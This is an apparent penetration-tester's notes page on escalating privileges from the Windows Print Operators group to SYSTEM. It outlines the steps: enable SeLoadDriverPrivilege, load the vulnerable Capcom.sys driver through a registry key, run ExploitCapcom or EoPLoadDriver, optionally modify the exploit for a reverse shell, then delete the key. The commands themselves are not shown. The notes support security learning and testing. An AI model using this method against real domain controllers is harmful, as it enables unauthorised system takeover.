Print Operators
About
Print Operators is another highly privileged group, which grants its members the SeLoadDriverPrivilege, rights to manage, create, share, and delete printers connected to a Domain Controller, as well as the ability to log on locally to a Domain Controller and shut it down.
Capcom Driver Abuse
The plan is to use EnableSeLoadDriverPrivilege script [LINK] to enable SeLoadDriverPrivilege. Then we need to load the Capcom.sys [LINK] driver, which was used originally as a anti-cheat for Capcom games, but it also have functionality to allow any user to execute shellcode with SYSTEM privileges. Then we make a Registry key and edit it for Capcom.sys to be seen. Then we check it with DriverView [LINK]. After we verified that info, we are using ExploitCapcom script [LINK] to get SYSTEM shell.
OR we can change code of ExploitCapcom to make a reverse shell for us (if we have no GUI access).
Check privs
EnableSeLoadPrivilege
Add Reference to Driver
You need to download Capcom.sys to C:\temp. Issue the commands below to add a reference to this driver under our HKEY_CURRENT_USER tree.
Verify Driver
Exploiting
Same stuff but automated
We can use EoPLoadDriver [LINK] script to automate process of enabling the privilege, creating the registry key, and executing NTLoadDriver to load the driver by using this command.
NO GUI
For that we need to find ExploitCapcom.cpp. change string below and recompile.
Cleanup
For a little clean up we could just delete registry key we made before.
Last updated